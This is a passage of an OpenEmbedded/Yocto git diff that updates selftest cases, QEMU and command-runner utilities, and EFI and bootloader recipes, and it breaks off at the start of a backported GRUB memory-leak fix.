             content = os.listdir("/dev/dri")
             if len([i for i in content if i.startswith('render')]) == 0:
@@ -226,7 +236,7 @@ class TestImage(OESelftestTestCase):
         except FileNotFoundError:
             self.skipTest("/dev/dri directory does not exist; no render nodes available on this machine.")
         try:
-            dripath = subprocess.check_output("pkg-config --variable=dridriverdir dri", shell=True)
+            dripath = subprocess.check_output("PATH=/bin:/usr/bin:$PATH pkg-config --variable=dridriverdir dri", shell=True)
         except subprocess.CalledProcessError as e:
             self.skipTest("Could not determine the path to dri drivers on the host via pkg-config.\nPlease install Mesa development files (particularly, dri.pc) on the host machine.")
         qemu_packageconfig = get_bb_var('PACKAGECONFIG', 'qemu-system-native')
diff --git a/meta/lib/oeqa/selftest/cases/sstatetests.py b/meta/lib/oeqa/selftest/cases/sstatetests.py
index c46e8ba489..1bfe88c87d 100644
--- a/meta/lib/oeqa/selftest/cases/sstatetests.py
+++ b/meta/lib/oeqa/selftest/cases/sstatetests.py
@@ -39,7 +39,7 @@ class SStateTests(SStateBase):
 
         recipefile = os.path.join(tempdir, "recipes-test", "dbus-wait-test", 'dbus-wait-test_git.bb')
         os.makedirs(os.path.dirname(recipefile))
-        srcuri = 'git://' + srcdir + ';protocol=file'
+        srcuri = 'git://' + srcdir + ';protocol=file;branch=master'
         result = runCmd(['recipetool', 'create', '-o', recipefile, srcuri])
         self.assertTrue(os.path.isfile(recipefile), 'recipetool did not create recipe file; output:\n%s' % result.output)
 
@@ -137,7 +137,7 @@ class SStateTests(SStateBase):
             filtered_results.append(r)
         self.assertTrue(filtered_results == [], msg="Found distro non-specific sstate for: %s (%s)" % (', '.join(map(str, targets)), str(filtered_results)))
         file_tracker_1 = self.search_sstate('|'.join(map(str, [s + r'.*?\.tgz$' for s in targets])), distro_specific=True, distro_nonspecific=False)
-        self.assertTrue(len(file_tracker_1) >= len(targets), msg = "Not all sstate files ware created for: %s" % ', '.join(map(str, targets)))
+        self.assertTrue(len(file_tracker_1) >= len(targets), msg = "Not all sstate files were created for: %s" % ', '.join(map(str, targets)))
 
         self.track_for_cleanup(self.distro_specific_sstate + "_old")
         shutil.copytree(self.distro_specific_sstate, self.distro_specific_sstate + "_old")
@@ -146,13 +146,13 @@ class SStateTests(SStateBase):
         bitbake(['-cclean'] + targets)
         bitbake(targets)
         file_tracker_2 = self.search_sstate('|'.join(map(str, [s + r'.*?\.tgz$' for s in targets])), distro_specific=True, distro_nonspecific=False)
-        self.assertTrue(len(file_tracker_2) >= len(targets), msg = "Not all sstate files ware created for: %s" % ', '.join(map(str, targets)))
+        self.assertTrue(len(file_tracker_2) >= len(targets), msg = "Not all sstate files were created for: %s" % ', '.join(map(str, targets)))
 
         not_recreated = [x for x in file_tracker_1 if x not in file_tracker_2]
-        self.assertTrue(not_recreated == [], msg="The following sstate files ware not recreated: %s" % ', '.join(map(str, not_recreated)))
+        self.assertTrue(not_recreated == [], msg="The following sstate files were not recreated: %s" % ', '.join(map(str, not_recreated)))
 
         created_once = [x for x in file_tracker_2 if x not in file_tracker_1]
-        self.assertTrue(created_once == [], msg="The following sstate files ware created only in the second run: %s" % ', '.join(map(str, created_once)))
+        self.assertTrue(created_once == [], msg="The following sstate files were created only in the second run: %s" % ', '.join(map(str, created_once)))
 
     def test_rebuild_distro_specific_sstate_cross_native_targets(self):
         self.run_test_rebuild_distro_specific_sstate(['binutils-cross-' + self.tune_arch, 'binutils-native'], temp_sstate_location=True)
@@ -202,9 +202,9 @@ class SStateTests(SStateBase):
         actual_remaining_sstate = [x for x in self.search_sstate(target + r'.*?\.tgz$') if not any(pattern in x for pattern in ignore_patterns)]
 
         actual_not_expected = [x for x in actual_remaining_sstate if x not in expected_remaining_sstate]
-        self.assertFalse(actual_not_expected, msg="Files should have been removed but ware not: %s" % ', '.join(map(str, actual_not_expected)))
+        self.assertFalse(actual_not_expected, msg="Files should have been removed but were not: %s" % ', '.join(map(str, actual_not_expected)))
         expected_not_actual = [x for x in expected_remaining_sstate if x not in actual_remaining_sstate]
-        self.assertFalse(expected_not_actual, msg="Extra files ware removed: %s" ', '.join(map(str, expected_not_actual)))
+        self.assertFalse(expected_not_actual, msg="Extra files were removed: %s" ', '.join(map(str, expected_not_actual)))
 
     def test_sstate_cache_management_script_using_pr_1(self):
         global_config = []
diff --git a/meta/lib/oeqa/selftest/cases/tinfoil.py b/meta/lib/oeqa/selftest/cases/tinfoil.py
index 206168ed00..6668d7cdc8 100644
--- a/meta/lib/oeqa/selftest/cases/tinfoil.py
+++ b/meta/lib/oeqa/selftest/cases/tinfoil.py
@@ -65,6 +65,20 @@ class TinfoilTests(OESelftestTestCase):
             localdata.setVar('PN', 'hello')
             self.assertEqual('hello', localdata.getVar('BPN'))
 
+    # The config_data API tp parse_recipe_file is used by:
+    # layerindex-web layerindex/update_layer.py
+    def test_parse_recipe_custom_data(self):
+        with bb.tinfoil.Tinfoil() as tinfoil:
+            tinfoil.prepare(config_only=False, quiet=2)
+            localdata = bb.data.createCopy(tinfoil.config_data)
+            localdata.setVar("TESTVAR", "testval")
+            testrecipe = 'mdadm'
+            best = tinfoil.find_best_provider(testrecipe)
+            if not best:
+                self.fail('Unable to find recipe providing %s' % testrecipe)
+            rd = tinfoil.parse_recipe_file(best[3], config_data=localdata)
+            self.assertEqual("testval", rd.getVar('TESTVAR'))
+
     def test_list_recipes(self):
         with bb.tinfoil.Tinfoil() as tinfoil:
             tinfoil.prepare(config_only=False, quiet=2)
@@ -87,36 +101,38 @@ class TinfoilTests(OESelftestTestCase):
         with bb.tinfoil.Tinfoil() as tinfoil:
             tinfoil.prepare(config_only=True)
 
-            tinfoil.set_event_mask(['bb.event.FilesMatchingFound', 'bb.command.CommandCompleted'])
+            tinfoil.set_event_mask(['bb.event.FilesMatchingFound', 'bb.command.CommandCompleted', 'bb.command.CommandFailed', 'bb.command.CommandExit'])
 
             # Need to drain events otherwise events that were masked may still be in the queue
             while tinfoil.wait_event():
                 pass
 
             pattern = 'conf'
-            res = tinfoil.run_command('findFilesMatchingInDir', pattern, 'conf/machine')
+            res = tinfoil.run_command('testCookerCommandEvent', pattern, handle_events=False)
             self.assertTrue(res)
 
             eventreceived = False
             commandcomplete = False
             start = time.time()
-            # Wait for 10s in total so we'd detect spurious heartbeat events for example
-            # The test is IO load sensitive too
-            while time.time() - start < 10:
+            # Wait for maximum 120s in total so we'd detect spurious heartbeat events for example
+            while (not (eventreceived == True and commandcomplete == True) 
+                    and (time.time() - start < 120)):
+                # if we received both events (on let's say a good day), we are done  
                 event = tinfoil.wait_event(1)
                 if event:
                     if isinstance(event, bb.command.CommandCompleted):
                         commandcomplete = True
                     elif isinstance(event, bb.event.FilesMatchingFound):
                         self.assertEqual(pattern, event._pattern)
-                        self.assertIn('qemuarm.conf', event._matches)
+                        self.assertIn('A', event._matches)
+                        self.assertIn('B', event._matches)
                         eventreceived = True
                     elif isinstance(event, logging.LogRecord):
                         continue
                     else:
                         self.fail('Unexpected event: %s' % event)
 
-            self.assertTrue(commandcomplete, 'Timed out waiting for CommandCompleted event from bitbake server')
+            self.assertTrue(commandcomplete, 'Timed out waiting for CommandCompleted event from bitbake server (Matching event received: %s)' % str(eventreceived))
             self.assertTrue(eventreceived, 'Did not receive FilesMatchingFound event from bitbake server')
 
     def test_setvariable_clean(self):
diff --git a/meta/lib/oeqa/selftest/cases/wic.py b/meta/lib/oeqa/selftest/cases/wic.py
index 13b6a0cc72..f7abdba015 100644
--- a/meta/lib/oeqa/selftest/cases/wic.py
+++ b/meta/lib/oeqa/selftest/cases/wic.py
@@ -62,6 +62,12 @@ def extract_files(debugfs_output):
     return [line.split('/')[5].strip() for line in \
             debugfs_output.strip().split('/\n')]
 
+def files_own_by_root(debugfs_output):
+    for line in debugfs_output.strip().split('/\n'):
+        if line.split('/')[3:5] != ['0', '0']:
+            print(debugfs_output)
+            return False
+    return True
 
 class WicTestCase(OESelftestTestCase):
     """Wic test class."""
@@ -84,6 +90,7 @@ class WicTestCase(OESelftestTestCase):
                 self.skipTest('wic-tools cannot be built due its (intltool|gettext)-native dependency and NLS disable')
 
             bitbake('core-image-minimal')
+            bitbake('core-image-minimal-mtdutils')
             WicTestCase.image_is_ready = True
 
         rmtree(self.resultdir, ignore_errors=True)
@@ -506,6 +513,105 @@ part /part2 --source rootfs --ondisk mmcblk0 --fstype=ext4 --include-path %s"""
                                       % (wks_file, self.resultdir), ignore_status=True).status)
         os.remove(wks_file)
 
+    def test_permissions(self):
+        """Test permissions are respected"""
+
+        # prepare wicenv and rootfs
+        bitbake('core-image-minimal core-image-minimal-mtdutils -c do_rootfs_wicenv')
+
+        oldpath = os.environ['PATH']
+        os.environ['PATH'] = get_bb_var("PATH", "wic-tools")
+
+        t_normal = """
+part / --source rootfs --fstype=ext4
+"""
+        t_exclude = """
+part / --source rootfs --fstype=ext4 --exclude-path=home
+"""
+        t_multi = """
+part / --source rootfs --ondisk sda --fstype=ext4
+part /export --source rootfs --rootfs=core-image-minimal-mtdutils --fstype=ext4
+"""
+        t_change = """
+part / --source rootfs --ondisk sda --fstype=ext4 --exclude-path=etc/   
+part /etc --source rootfs --fstype=ext4 --change-directory=etc
+"""
+        tests = [t_normal, t_exclude, t_multi, t_change]
+
+        try:
+            for test in tests:
+                include_path = os.path.join(self.resultdir, 'test-include')
+                os.makedirs(include_path)
+                wks_file = os.path.join(include_path, 'temp.wks')
+                with open(wks_file, 'w') as wks:
+                    wks.write(test)
+                runCmd("wic create %s -e core-image-minimal -o %s" \
+                                       % (wks_file, self.resultdir))
+
+                for part in glob(os.path.join(self.resultdir, 'temp-*.direct.p*')):
+                    res = runCmd("debugfs -R 'ls -p' %s 2>/dev/null" % (part))
+                    self.assertEqual(True, files_own_by_root(res.output))
+
+                config = 'IMAGE_FSTYPES += "wic"\nWKS_FILE = "%s"\n' % wks_file
+                self.append_config(config)
+                bitbake('core-image-minimal')
+                tmpdir = os.path.join(get_bb_var('WORKDIR', 'core-image-minimal'),'build-wic')
+
+                # check each partition for permission
+                for part in glob(os.path.join(tmpdir, 'temp-*.direct.p*')):
+                    res = runCmd("debugfs -R 'ls -p' %s 2>/dev/null" % (part))
+                    self.assertTrue(files_own_by_root(res.output)
+                        ,msg='Files permission incorrect using wks set "%s"' % test)
+
+                # clean config and result directory for next cases
+                self.remove_config(config)
+                rmtree(self.resultdir, ignore_errors=True)
+
+        finally:
+            os.environ['PATH'] = oldpath
+
+    def test_change_directory(self):
+        """Test --change-directory wks option."""
+
+        oldpath = os.environ['PATH']
+        os.environ['PATH'] = get_bb_var("PATH", "wic-tools")
+
+        try:
+            include_path = os.path.join(self.resultdir, 'test-include')
+            os.makedirs(include_path)
+            wks_file = os.path.join(include_path, 'temp.wks')
+            with open(wks_file, 'w') as wks:
+                wks.write("part /etc --source rootfs --fstype=ext4 --change-directory=etc")
+            runCmd("wic create %s -e core-image-minimal -o %s" \
+                                       % (wks_file, self.resultdir))
+
+            part1 = glob(os.path.join(self.resultdir, 'temp-*.direct.p1'))[0]
+
+            res = runCmd("debugfs -R 'ls -p' %s 2>/dev/null" % (part1))
+            files = extract_files(res.output)
+            self.assertIn('passwd', files)
+
+        finally:
+            os.environ['PATH'] = oldpath
+
+    def test_change_directory_errors(self):
+        """Test --change-directory wks option error handling."""
+        wks_file = 'temp.wks'
+
+        # Absolute argument.
+        with open(wks_file, 'w') as wks:
+            wks.write("part / --source rootfs --fstype=ext4 --change-directory /usr")
+        self.assertNotEqual(0, runCmd("wic create %s -e core-image-minimal -o %s" \
+                                      % (wks_file, self.resultdir), ignore_status=True).status)
+        os.remove(wks_file)
+
+        # Argument pointing to parent directory.
+        with open(wks_file, 'w') as wks:
+            wks.write("part / --source rootfs --fstype=ext4 --change-directory ././..")
+        self.assertNotEqual(0, runCmd("wic create %s -e core-image-minimal -o %s" \
+                                      % (wks_file, self.resultdir), ignore_status=True).status)
+        os.remove(wks_file)
+
 class Wic2(WicTestCase):
 
     def test_bmap_short(self):
@@ -799,14 +905,18 @@ class Wic2(WicTestCase):
     @only_for_arch(['i586', 'i686', 'x86_64'])
     def test_rawcopy_plugin_qemu(self):
         """Test rawcopy plugin in qemu"""
-        # build ext4 and wic images
-        for fstype in ("ext4", "wic"):
-            config = 'IMAGE_FSTYPES = "%s"\nWKS_FILE = "test_rawcopy_plugin.wks.in"\n' % fstype
-            self.append_config(config)
-            self.assertEqual(0, bitbake('core-image-minimal').status)
-            self.remove_config(config)
+        # build ext4 and then use it for a wic image
+        config = 'IMAGE_FSTYPES = "ext4"\n'
+        self.append_config(config)
+        self.assertEqual(0, bitbake('core-image-minimal').status)
+        self.remove_config(config)
 
-        with runqemu('core-image-minimal', ssh=False, image_fstype='wic') as qemu:
+        config = 'IMAGE_FSTYPES = "wic"\nWKS_FILE = "test_rawcopy_plugin.wks.in"\n'
+        self.append_config(config)
+        self.assertEqual(0, bitbake('core-image-minimal-mtdutils').status)
+        self.remove_config(config)
+
+        with runqemu('core-image-minimal-mtdutils', ssh=False, image_fstype='wic') as qemu:
             cmd = "grep sda. /proc/partitions  |wc -l"
             status, output = qemu.run_serial(cmd)
             self.assertEqual(1, status, 'Failed to run command "%s": %s' % (cmd, output))
diff --git a/meta/lib/oeqa/selftest/context.py b/meta/lib/oeqa/selftest/context.py
index 33557b1240..be3ec6401f 100644
--- a/meta/lib/oeqa/selftest/context.py
+++ b/meta/lib/oeqa/selftest/context.py
@@ -34,7 +34,7 @@ class NonConcurrentTestSuite(unittest.TestSuite):
         (builddir, newbuilddir) = self.setupfunc("-st", None, self.suite)
         ret = super().run(result)
         os.chdir(builddir)
-        if newbuilddir and ret.wasSuccessful():
+        if newbuilddir and ret.wasSuccessful() and self.removefunc:
             self.removefunc(newbuilddir)
 
 def removebuilddir(d):
@@ -54,7 +54,7 @@ def removebuilddir(d):
     bb.utils.prunedir(d, ionice=True)
 
 class OESelftestTestContext(OETestContext):
-    def __init__(self, td=None, logger=None, machines=None, config_paths=None, newbuilddir=None):
+    def __init__(self, td=None, logger=None, machines=None, config_paths=None, newbuilddir=None, keep_builddir=None):
         super(OESelftestTestContext, self).__init__(td, logger)
 
         self.machines = machines
@@ -62,6 +62,11 @@ class OESelftestTestContext(OETestContext):
         self.config_paths = config_paths
         self.newbuilddir = newbuilddir
 
+        if keep_builddir:
+            self.removebuilddir = None
+        else:
+            self.removebuilddir = removebuilddir
+
     def setup_builddir(self, suffix, selftestdir, suite):
         builddir = os.environ['BUILDDIR']
         if not selftestdir:
@@ -119,9 +124,9 @@ class OESelftestTestContext(OETestContext):
         if processes:
             from oeqa.core.utils.concurrencytest import ConcurrentTestSuite
 
-            return ConcurrentTestSuite(suites, processes, self.setup_builddir, removebuilddir)
+            return ConcurrentTestSuite(suites, processes, self.setup_builddir, self.removebuilddir)
         else:
-            return NonConcurrentTestSuite(suites, processes, self.setup_builddir, removebuilddir)
+            return NonConcurrentTestSuite(suites, processes, self.setup_builddir, self.removebuilddir)
 
     def runTests(self, processes=None, machine=None, skips=[]):
         if machine:
@@ -179,6 +184,9 @@ class OESelftestTestContextExecutor(OETestContextExecutor):
                 action='append', default=None,
                 help='Exclude all (unhidden) tests that match any of the specified tag(s). (exclude applies before select)')
 
+        parser.add_argument('-K', '--keep-builddir', action='store_true',
+                help='Keep the test build directory even if all tests pass')
+
         parser.add_argument('-B', '--newbuilddir', help='New build directory to use for tests.')
         parser.set_defaults(func=self.run)
 
@@ -235,6 +243,7 @@ class OESelftestTestContextExecutor(OETestContextExecutor):
         self.tc_kwargs['init']['config_paths']['localconf'] = os.path.join(builddir, "conf/local.conf")
         self.tc_kwargs['init']['config_paths']['bblayers'] = os.path.join(builddir, "conf/bblayers.conf")
         self.tc_kwargs['init']['newbuilddir'] = args.newbuilddir
+        self.tc_kwargs['init']['keep_builddir'] = args.keep_builddir
 
         def tag_filter(tags):
             if args.exclude_tags:
diff --git a/meta/lib/oeqa/utils/buildproject.py b/meta/lib/oeqa/utils/buildproject.py
index e6d80cc8dc..dfb9661868 100644
--- a/meta/lib/oeqa/utils/buildproject.py
+++ b/meta/lib/oeqa/utils/buildproject.py
@@ -18,6 +18,7 @@ class BuildProject(metaclass=ABCMeta):
     def __init__(self, uri, foldername=None, tmpdir=None, dl_dir=None):
         self.uri = uri
         self.archive = os.path.basename(uri)
+        self.tempdirobj = None
         if not tmpdir:
             self.tempdirobj = tempfile.TemporaryDirectory(prefix='buildproject-')
             tmpdir = self.tempdirobj.name
@@ -57,6 +58,8 @@ class BuildProject(metaclass=ABCMeta):
         return self._run('cd %s; make install %s' % (self.targetdir, install_args))
 
     def clean(self):
+        if self.tempdirobj:
+            self.tempdirobj.cleanup()
         if not self.needclean:
              return
         self._run('rm -rf %s' % self.targetdir)
diff --git a/meta/lib/oeqa/utils/commands.py b/meta/lib/oeqa/utils/commands.py
index 8059cbce3e..024261410e 100644
--- a/meta/lib/oeqa/utils/commands.py
+++ b/meta/lib/oeqa/utils/commands.py
@@ -125,11 +125,11 @@ class Command(object):
 
     def stop(self):
         for thread in self.threads:
-            if thread.isAlive():
+            if thread.is_alive():
                 self.process.terminate()
             # let's give it more time to terminate gracefully before killing it
             thread.join(5)
-            if thread.isAlive():
+            if thread.is_alive():
                 self.process.kill()
                 thread.join()
 
@@ -174,11 +174,8 @@ def runCmd(command, ignore_status=False, timeout=None, assert_error=True, sync=T
     if native_sysroot:
         extra_paths = "%s/sbin:%s/usr/sbin:%s/usr/bin" % \
                       (native_sysroot, native_sysroot, native_sysroot)
-        extra_libpaths = "%s/lib:%s/usr/lib" % \
-                         (native_sysroot, native_sysroot)
         nenv = dict(options.get('env', os.environ))
         nenv['PATH'] = extra_paths + ':' + nenv.get('PATH', '')
-        nenv['LD_LIBRARY_PATH'] = extra_libpaths + ':' + nenv.get('LD_LIBRARY_PATH', '')
         options['env'] = nenv
 
     cmd = Command(command, timeout=timeout, output_log=output_log, **options)
@@ -188,7 +185,10 @@ def runCmd(command, ignore_status=False, timeout=None, assert_error=True, sync=T
     # call sync around the tests to ensure the IO queue doesn't get too large, taking any IO
     # hit here rather than in bitbake shutdown.
     if sync:
+        p = os.environ['PATH']
+        os.environ['PATH'] = "/usr/bin:/bin:/usr/sbin:/sbin:" + p
         os.system("sync")
+        os.environ['PATH'] = p
 
     result.command = command
     result.status = cmd.status
diff --git a/meta/lib/oeqa/utils/metadata.py b/meta/lib/oeqa/utils/metadata.py
index 8013aa684d..15ec190c4a 100644
--- a/meta/lib/oeqa/utils/metadata.py
+++ b/meta/lib/oeqa/utils/metadata.py
@@ -27,9 +27,9 @@ def metadata_from_bb():
     data_dict = get_bb_vars()
 
     # Distro information
-    info_dict['distro'] = {'id': data_dict['DISTRO'],
-                           'version_id': data_dict['DISTRO_VERSION'],
-                           'pretty_name': '%s %s' % (data_dict['DISTRO'], data_dict['DISTRO_VERSION'])}
+    info_dict['distro'] = {'id': data_dict.get('DISTRO', 'NODISTRO'),
+                                'version_id': data_dict.get('DISTRO_VERSION', 'NO_DISTRO_VERSION'),
+                                'pretty_name': '%s %s' % (data_dict.get('DISTRO', 'NODISTRO'), data_dict.get('DISTRO_VERSION', 'NO_DISTRO_VERSION'))}
 
     # Host distro information
     os_release = get_os_release()
diff --git a/meta/lib/oeqa/utils/nfs.py b/meta/lib/oeqa/utils/nfs.py
index a37686c914..c9bac050a4 100644
--- a/meta/lib/oeqa/utils/nfs.py
+++ b/meta/lib/oeqa/utils/nfs.py
@@ -8,7 +8,7 @@ from oeqa.utils.commands import bitbake, get_bb_var, Command
 from oeqa.utils.network import get_free_port
 
 @contextlib.contextmanager
-def unfs_server(directory, logger = None):
+def unfs_server(directory, logger = None, udp = True):
     unfs_sysroot = get_bb_var("RECIPE_SYSROOT_NATIVE", "unfs3-native")
     if not os.path.exists(os.path.join(unfs_sysroot, "usr", "bin", "unfsd")):
         # build native tool
@@ -22,7 +22,7 @@ def unfs_server(directory, logger = None):
             exports.write("{0} (rw,no_root_squash,no_all_squash,insecure)\n".format(directory).encode())
 
         # find some ports for the server
-        nfsport, mountport = get_free_port(udp = True), get_free_port(udp = True)
+        nfsport, mountport = get_free_port(udp), get_free_port(udp)
 
         nenv = dict(os.environ)
         nenv['PATH'] = "{0}/sbin:{0}/usr/sbin:{0}/usr/bin:".format(unfs_sysroot) + nenv.get('PATH', '')
diff --git a/meta/lib/oeqa/utils/qemurunner.py b/meta/lib/oeqa/utils/qemurunner.py
index 77ec939ad7..c84d299a80 100644
--- a/meta/lib/oeqa/utils/qemurunner.py
+++ b/meta/lib/oeqa/utils/qemurunner.py
@@ -70,6 +70,8 @@ class QemuRunner:
         self.monitorpipe = None
 
         self.logger = logger
+        # Whether we're expecting an exit and should show related errors
+        self.canexit = False
 
         # Enable testing other OS's
         # Set commands for target communication, and default to Linux ALWAYS
@@ -118,7 +120,10 @@ class QemuRunner:
         import fcntl
         fl = fcntl.fcntl(o, fcntl.F_GETFL)
         fcntl.fcntl(o, fcntl.F_SETFL, fl | os.O_NONBLOCK)
-        return os.read(o.fileno(), 1000000).decode("utf-8")
+        try:
+            return os.read(o.fileno(), 1000000).decode("utf-8")
+        except BlockingIOError:
+            return ""
 
 
     def handleSIGCHLD(self, signum, frame):
@@ -229,7 +234,7 @@ class QemuRunner:
             r = os.fdopen(r)
             x = r.read()
             os.killpg(os.getpgid(self.runqemu.pid), signal.SIGTERM)
-            sys.exit(0)
+            os._exit(0)
 
         self.logger.debug("runqemu started, pid is %s" % self.runqemu.pid)
         self.logger.debug("waiting at most %s seconds for qemu pid (%s)" %
@@ -427,12 +432,17 @@ class QemuRunner:
                 except OSError as e:
                     if e.errno != errno.ESRCH:
                         raise
-            endtime = time.time() + self.runqemutime
-            while self.runqemu.poll() is None and time.time() < endtime:
-                time.sleep(1)
-            if self.runqemu.poll() is None:
+            try:
+                outs, errs = self.runqemu.communicate(timeout = self.runqemutime)
+                if outs:
+                    self.logger.info("Output from runqemu:\n%s", outs.decode("utf-8"))
+                if errs:
+                    self.logger.info("Stderr from runqemu:\n%s", errs.decode("utf-8"))
+            except TimeoutExpired:
                 self.logger.debug("Sending SIGKILL to runqemu")
                 os.killpg(os.getpgid(self.runqemu.pid), signal.SIGKILL)
+            if not self.runqemu.stdout.closed:
+                self.logger.info("Output from runqemu:\n%s" % self.getOutput(self.runqemu.stdout))
             self.runqemu.stdin.close()
             self.runqemu.stdout.close()
             self.runqemu_exited = True
@@ -467,6 +477,11 @@ class QemuRunner:
             self.thread.stop()
             self.thread.join()
 
+    def allowexit(self):
+        self.canexit = True
+        if self.thread:
+            self.thread.allowexit()
+
     def restart(self, qemuparams = None):
         self.logger.warning("Restarting qemu process")
         if self.runqemu.poll() is None:
@@ -522,7 +537,9 @@ class QemuRunner:
                     if re.search(self.boot_patterns['search_cmd_finished'], data):
                         break
                 else:
-                    raise Exception("No data on serial console socket")
+                    if self.canexit:
+                        return (1, "")
+                    raise Exception("No data on serial console socket, connection closed?")
 
         if data:
             if raw:
@@ -560,6 +577,7 @@ class LoggingThread(threading.Thread):
         self.logger = logger
         self.readsock = None
         self.running = False
+        self.canexit = False
 
         self.errorevents = select.POLLERR | select.POLLHUP | select.POLLNVAL
         self.readevents = select.POLLIN | select.POLLPRI
@@ -593,6 +611,9 @@ class LoggingThread(threading.Thread):
         self.close_ignore_error(self.writepipe)
         self.running = False
 
+    def allowexit(self):
+        self.canexit = True
+
     def eventloop(self):
         poll = select.poll()
         event_read_mask = self.errorevents | self.readevents
@@ -638,7 +659,7 @@ class LoggingThread(threading.Thread):
             data = self.readsock.recv(count)
         except socket.error as e:
             if e.errno == errno.EAGAIN or e.errno == errno.EWOULDBLOCK:
-                return ''
+                return b''
             else:
                 raise
 
@@ -649,7 +670,9 @@ class LoggingThread(threading.Thread):
             # happened. But for this code it counts as an
             # error since the connection shouldn't go away
             # until qemu exits.
-            raise Exception("Console connection closed unexpectedly")
+            if not self.canexit:
+                raise Exception("Console connection closed unexpectedly")
+            return b''
 
         return data
 
diff --git a/meta/lib/oeqa/utils/targetbuild.py b/meta/lib/oeqa/utils/targetbuild.py
index 1055810ca3..09738add1d 100644
--- a/meta/lib/oeqa/utils/targetbuild.py
+++ b/meta/lib/oeqa/utils/targetbuild.py
@@ -19,6 +19,7 @@ class BuildProject(metaclass=ABCMeta):
         self.d = d
         self.uri = uri
         self.archive = os.path.basename(uri)
+        self.tempdirobj = None
         if not tmpdir:
             tmpdir = self.d.getVar('WORKDIR')
             if not tmpdir:
@@ -71,9 +72,10 @@ class BuildProject(metaclass=ABCMeta):
         return self._run('cd %s; make install %s' % (self.targetdir, install_args))
 
     def clean(self):
+        if self.tempdirobj:
+            self.tempdirobj.cleanup()
         self._run('rm -rf %s' % self.targetdir)
         subprocess.check_call('rm -f %s' % self.localarchive, shell=True)
-        pass
 
 class TargetBuildProject(BuildProject):
 
diff --git a/meta/recipes-bsp/efibootmgr/efibootmgr_17.bb b/meta/recipes-bsp/efibootmgr/efibootmgr_17.bb
index 5d6f200a73..e9dfa0770e 100644
--- a/meta/recipes-bsp/efibootmgr/efibootmgr_17.bb
+++ b/meta/recipes-bsp/efibootmgr/efibootmgr_17.bb
@@ -10,7 +10,7 @@ DEPENDS = "efivar popt"
 
 COMPATIBLE_HOST = "(i.86|x86_64|arm|aarch64).*-linux"
 
-SRC_URI = "git://github.com/rhinstaller/efibootmgr.git;protocol=https \
+SRC_URI = "git://github.com/rhinstaller/efibootmgr.git;protocol=https;branch=master \
            file://0001-remove-extra-decl.patch \
            file://97668ae0bce776a36ea2001dea63d376be8274ac.patch \
           "
diff --git a/meta/recipes-bsp/efivar/efivar/determinism.patch b/meta/recipes-bsp/efivar/efivar/determinism.patch
new file mode 100644
index 0000000000..bdf6bfc4a8
--- /dev/null
+++ b/meta/recipes-bsp/efivar/efivar/determinism.patch
@@ -0,0 +1,18 @@
+Fix reproducibility issue caused by unsorted wildcard expansion.
+
+Upstream-Status: Pending
+RP 2021/3/1
+
+Index: git/src/Makefile
+===================================================================
+--- git.orig/src/Makefile
++++ git/src/Makefile
+@@ -15,7 +15,7 @@ TARGETS=$(LIBTARGETS) $(BINTARGETS) $(PC
+ STATICTARGETS=$(STATICLIBTARGETS) $(STATICBINTARGETS)
+ 
+ LIBEFIBOOT_SOURCES = crc32.c creator.c disk.c gpt.c loadopt.c path-helpers.c \
+-		     linux.c $(wildcard linux-*.c)
++		     linux.c $(sort $(wildcard linux-*.c))
+ LIBEFIBOOT_OBJECTS = $(patsubst %.c,%.o,$(LIBEFIBOOT_SOURCES))
+ LIBEFIVAR_SOURCES = dp.c dp-acpi.c dp-hw.c dp-media.c dp-message.c \
+ 	efivarfs.c error.c export.c guid.c guids.S guid-symbols.c \
diff --git a/meta/recipes-bsp/efivar/efivar_37.bb b/meta/recipes-bsp/efivar/efivar_37.bb
index 9b95721a4e..858c61ae6a 100644
--- a/meta/recipes-bsp/efivar/efivar_37.bb
+++ b/meta/recipes-bsp/efivar/efivar_37.bb
@@ -7,7 +7,8 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=6626bb1e20189cfa95f2c508ba286393"
 
 COMPATIBLE_HOST = "(i.86|x86_64|arm|aarch64).*-linux"
 
-SRC_URI = "git://github.com/rhinstaller/efivar.git \
+SRC_URI = "git://github.com/rhinstaller/efivar.git;branch=main;protocol=https \
+           file://determinism.patch \
            file://no-werror.patch"
 SRCREV = "c1d6b10e1ed4ba2be07f385eae5bceb694478a10"
 
diff --git a/meta/recipes-bsp/gnu-efi/gnu-efi_3.0.11.bb b/meta/recipes-bsp/gnu-efi/gnu-efi_3.0.11.bb
index 9954d7f57a..191b0bc176 100644
--- a/meta/recipes-bsp/gnu-efi/gnu-efi_3.0.11.bb
+++ b/meta/recipes-bsp/gnu-efi/gnu-efi_3.0.11.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Libraries for producing EFI binaries"
 HOMEPAGE = "http://sourceforge.net/projects/gnu-efi/"
+DESCRIPTION = "GNU-EFI aims to Develop EFI applications for ARM-64, ARM-32, x86_64, IA-64 (IPF), IA-32 (x86), and MIPS platforms using the GNU toolchain and the EFI development environment."
 SECTION = "devel"
 LICENSE = "GPLv2+ | BSD-2-Clause"
 LIC_FILES_CHKSUM = "file://gnuefi/crt0-efi-arm.S;beginline=4;endline=16;md5=e582764a4776e60c95bf9ab617343d36 \
diff --git a/meta/recipes-bsp/grub/files/0001-mmap-Fix-memory-leak-when-iterating-over-mapped-memo.patch b/meta/recipes-bsp/grub/files/0001-mmap-Fix-memory-leak-when-iterating-over-mapped-memo.patch
new file mode 100644
index 0000000000..eaaa7effae
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0001-mmap-Fix-memory-leak-when-iterating-over-mapped-memo.patch
@@ -0,0 +1,39 @@
+From 0900f11def2e7fbb4880efff0cd9c9b32f1cdb86 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 3 Dec 2020 14:39:45 +0000
+Subject: [PATCH] mmap: Fix memory leak when iterating over mapped memory
+
+When returning from grub_mmap_iterate() the memory allocated to present
+is not being released causing it to leak.
+
+Fixes: CID 96655
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=8cb2848f9699642a698af84b12ba187cab722031]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/mmap/mmap.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/grub-core/mmap/mmap.c b/grub-core/mmap/mmap.c
+index 7ebf32e..8bf235f 100644
+--- a/grub-core/mmap/mmap.c
++++ b/grub-core/mmap/mmap.c
